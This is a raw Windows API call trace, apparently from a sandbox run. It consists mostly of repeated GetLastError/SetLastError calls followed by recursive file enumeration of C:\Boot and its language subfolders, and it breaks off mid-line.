[0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.549] GetLastError () returned 0x0 [0111.549] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.550] SetLastError (dwErrCode=0x0) [0111.550] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.551] SetLastError (dwErrCode=0x0) [0111.551] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.552] SetLastError (dwErrCode=0x0) [0111.552] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.553] SetLastError (dwErrCode=0x0) [0111.553] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.554] SetLastError (dwErrCode=0x0) [0111.554] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.555] SetLastError (dwErrCode=0x0) [0111.555] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] GetLastError () returned 0x0 [0111.556] SetLastError (dwErrCode=0x0) [0111.556] SetEvent (hEvent=0x278) returned 1 [0111.556] ResetEvent (hEvent=0x27c) returned 1 [0111.556] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.557] SetLastError (dwErrCode=0x0) [0111.557] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.558] SetLastError (dwErrCode=0x0) [0111.558] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.559] SetLastError (dwErrCode=0x0) [0111.559] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.560] GetLastError () returned 0x0 [0111.560] SetLastError (dwErrCode=0x0) [0111.561] GetLastError () returned 0x0 [0111.561] SetLastError (dwErrCode=0x0) [0111.561] GetLastError () returned 0x0 [0111.561] SetLastError (dwErrCode=0x0) [0111.561] GetLastError () returned 0x0 [0111.561] SetLastError (dwErrCode=0x0) [0111.561] GetLastError () returned 0x0 [0111.561] SetLastError (dwErrCode=0x0) [0111.561] GetLastError () returned 0x0 [0111.561] SetLastError (dwErrCode=0x0) [0111.561] GetLastError () returned 0x0 [0111.561] SetLastError (dwErrCode=0x0) [0111.561] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.562] SetLastError (dwErrCode=0x0) [0111.562] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] GetLastError () returned 0x0 [0111.563] SetLastError (dwErrCode=0x0) [0111.563] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.563] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.564] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.564] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0 [0111.564] FindClose (in: hFindFile=0x29c0a0 | out: hFindFile=0x29c0a0) returned 1 [0111.564] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0111.564] FindNextFileW (in: hFindFile=0x29c060, lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 1 [0111.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0x29c0a0 [0111.566] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.566] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.566] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.566] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.566] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.566] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.566] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.567] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.567] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.567] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.567] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.567] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.567] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.567] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.567] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.567] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.568] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.568] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.568] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.569] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.569] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.569] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.569] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.569] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.569] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.569] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.569] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.569] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.569] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.569] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.569] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.570] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.570] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.570] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.570] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.570] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.570] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.570] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.571] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.571] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.572] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.572] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.572] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.572] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.572] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.572] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.572] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.572] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.572] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.572] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.573] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.573] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.573] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.573] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.574] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.574] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.574] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.574] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.574] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.574] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.575] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.575] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.575] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.575] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.575] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.575] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.575] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.575] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.575] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.575] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.575] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.575] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.575] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.576] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.576] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.576] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.576] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.577] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.577] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.577] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.577] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.577] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.577] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0 [0111.577] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.577] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: 